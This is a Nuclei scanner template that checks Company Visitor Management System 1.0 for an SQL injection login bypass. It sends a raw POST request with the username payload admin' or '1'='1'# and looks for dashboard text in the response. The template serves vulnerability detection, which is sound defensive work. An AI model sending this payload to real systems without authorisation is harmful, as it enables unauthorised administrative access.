nuclei-templates/vulnerabilities/other/cvms-sqli.yaml

37 lines
865 B
YAML
Raw Normal View History

2022-07-21 07:27:46 +00:00
id: cvms-sqli
info:
name: Company Visitor Management System (CVMS) 1.0 - SQLi Authentication Bypass
author: arafatansari
severity: high
description: |
Company Visitor Management System Login page can be bypassed with a simple SQLi to the username parameter.
reference:
- https://www.exploit-db.com/exploits/48884
tags: sqli,bypass,cms
requests:
- raw:
- |
POST /index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=admin%27+or+%271%27%3D%271%27%23&password=nuclei&login=
redirects: true
max-redirects: 2
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'window.start_load'
- 'CVMS'
- 'Dashboard'
- type: status
status:
- 200